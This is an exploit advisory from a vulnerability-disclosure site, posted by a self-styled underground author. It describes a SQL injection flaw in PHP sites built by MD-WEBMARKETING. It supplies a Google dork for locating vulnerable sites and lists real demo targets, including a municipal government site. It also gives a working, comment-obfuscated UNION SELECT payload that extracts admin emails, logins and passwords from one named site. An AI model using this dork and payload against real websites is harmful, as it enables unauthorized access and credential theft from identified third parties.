MD-WEBMARKETING - SQL Injection vulnerability

2020.01.12
de Unkn0wn (DE) de
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
Dork: intext:"Desenvolvido por: MD-WEBMARKETING" inurl:.php?id=

--------------------------------------------------------- # Exploit Title: MD-WEBMARKETING - SQL Injection vulnerability # Google Dork: intext:"Desenvolvido por: MD-WEBMARKETING" inurl:.php?id= # Date: 2020-01-09 # Exploit Author: Unkn0wn # Vendor Homepage: http://mdwebmarketing.com.br/ # Software Link: - # Version: - # Tested on: Ubuntu # CVE : N/A --------------------------------------------------------- Demo: http://www.camaradeodapolis.ms.gov.br/exibe.php?id=117[SQL injection] http://amesccg.com.br/beneficios.php?tipo=2[SQL injection] http://amesccg.com.br/beneficios.php?tipo=-2+/*!50000Union*/+SeleCt+1,2,3,/*!50000Group_ConCat(email,0x3a,login,0x3a,senha)*/,5,6,7+From+administracao--+ ---------------------------------------------------------- # contact : 0x9a@tuta.io # Visit: https://t.me/l314XK205E # <UndergroundLife/> 2010 - 2020


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top